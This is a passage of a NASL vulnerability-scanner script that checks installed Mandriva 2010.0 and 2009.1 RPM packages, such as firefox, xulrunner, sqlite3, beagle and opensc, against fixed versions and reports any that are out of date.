rpm:\"beagle-gui~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-plasmanotify\", rpm:\"firefox-ext-plasmanotify~0.3.0~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-r-kiosk\", rpm:\"firefox-ext-r-kiosk~0.7.2~9.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.4.5~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.3.3~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~7.5mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-common\", rpm:\"google-gadgets-common~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-gtk\", rpm:\"google-gadgets-gtk~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-qt\", rpm:\"google-gadgets-qt~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget1.0_0\", rpm:\"libggadget1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-dbus1.0_0\", rpm:\"libggadget-dbus1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-gtk1.0_0\", rpm:\"libggadget-gtk1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-js1.0_0\", rpm:\"libggadget-js1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-npapi1.0_0\", rpm:\"libggadget-npapi1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-qt1.0_0\", rpm:\"libggadget-qt1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-webkitjs0\", rpm:\"libggadget-webkitjs0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-xdg1.0_0\", rpm:\"libggadget-xdg1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgoogle-gadgets-devel\", rpm:\"libgoogle-gadgets-devel~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.28.0~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets\", rpm:\"google-gadgets~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget1.0_0\", rpm:\"lib64ggadget1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-dbus1.0_0\", rpm:\"lib64ggadget-dbus1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-gtk1.0_0\", rpm:\"lib64ggadget-gtk1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-js1.0_0\", rpm:\"lib64ggadget-js1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-npapi1.0_0\", rpm:\"lib64ggadget-npapi1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-qt1.0_0\", rpm:\"lib64ggadget-qt1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-webkitjs0\", rpm:\"lib64ggadget-webkitjs0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-xdg1.0_0\", rpm:\"lib64ggadget-xdg1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64google-gadgets-devel\", rpm:\"lib64google-gadgets-devel~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-epiphany\", rpm:\"beagle-epiphany~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", rpm:\"beagle-gui~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany\", rpm:\"epiphany~2.26.1~1.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany-devel\", rpm:\"epiphany-devel~2.26.1~1.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n 